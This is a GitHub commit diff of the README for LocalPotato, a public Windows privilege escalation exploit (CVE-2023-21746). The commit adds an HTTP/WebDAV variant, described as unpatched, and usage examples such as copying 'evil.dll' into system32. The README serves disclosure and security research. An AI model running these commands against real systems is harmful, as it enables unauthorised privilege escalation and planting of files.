Skip to content

Commit 742109d

Browse files
authored
Update README.md
1 parent f174854 commit 742109d

File tree

1 file changed

+21
-5
lines changed

1 file changed

+21
-5
lines changed

README.md

Lines changed: 21 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -3,32 +3,48 @@ Another Local Windows privilege escalation using a new potato technique ;)
33

44
The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.
55

6-
**NOTE: This vulnerability has been fixed by Microsoft in the January 2023 Patch Tuesday with the [CVE-2023-21746](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-21746). If you run this exploit against a patched machine it won't work.**
6+
**NOTE: The SMB scenario has been fixed by Microsoft in the January 2023 Patch Tuesday with the [CVE-2023-21746](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-21746). If you run this exploit against a patched machine it won't work.**
7+
8+
**NOTE2: The HTTP/WebDAV scenario is currently unpatched (Microsoft decision, we reported it) and works on updated systems.**
9+
710

811
More technical details at --> https://www.localpotato.com/localpotato_html/LocalPotato.html
912

1013
## Usage
1114

1215
```
1316
14-
LocalPotato (aka CVE-2023-21746)
17+
LocalPotato (aka CVE-2023-21746 & HTTP/WebDAV)
1518
by splinter_code & decoder_it
1619
1720
1821
Mandatory Args:
19-
-i Source file to copy
20-
-o Output file - do not specify the drive letter
21-
Example: localpotato -i c:\hacker\evil.dll -o windows\system32\evil.dll
22+
SMB:
23+
-i Source file to copy for SMB
24+
-o Output file for SMB - do not specify the drive letter
25+
HTTP:
26+
-r host/ip for HTTP
27+
-u target URL for HTTP
2228
2329
Optional Args:
2430
-c CLSID (Default {854A20FB-2D44-457D-992F-EF13785D2B51})
2531
-p COM server port (Default 10271)
32+
33+
Examples:
34+
- SMB:
35+
LocalPotato.exe -i c:\hacker\evil.dll -o windows\system32\evil.dll
36+
- HTTP/WebDAV:
37+
LocalPotato.exe -r 127.0.0.1 -u /webdavshare/potato.local
2638
```
2739

2840
## Demo
2941

42+
- SMB:
3043
![image](https://user-images.githubusercontent.com/19797064/218135881-af046286-c299-4f08-856b-2265adc46e64.png)
3144

45+
- HTTP/WebDAV
46+
![image](https://github.com/decoder-it/LocalPotato/assets/19797064/100db270-e1e2-44db-ae54-91c3a7cb9b15)
47+
3248

3349
## Authors:
3450
- [@decoder_it](https://twitter.com/decoder_it)

0 commit comments

Comments
 (0)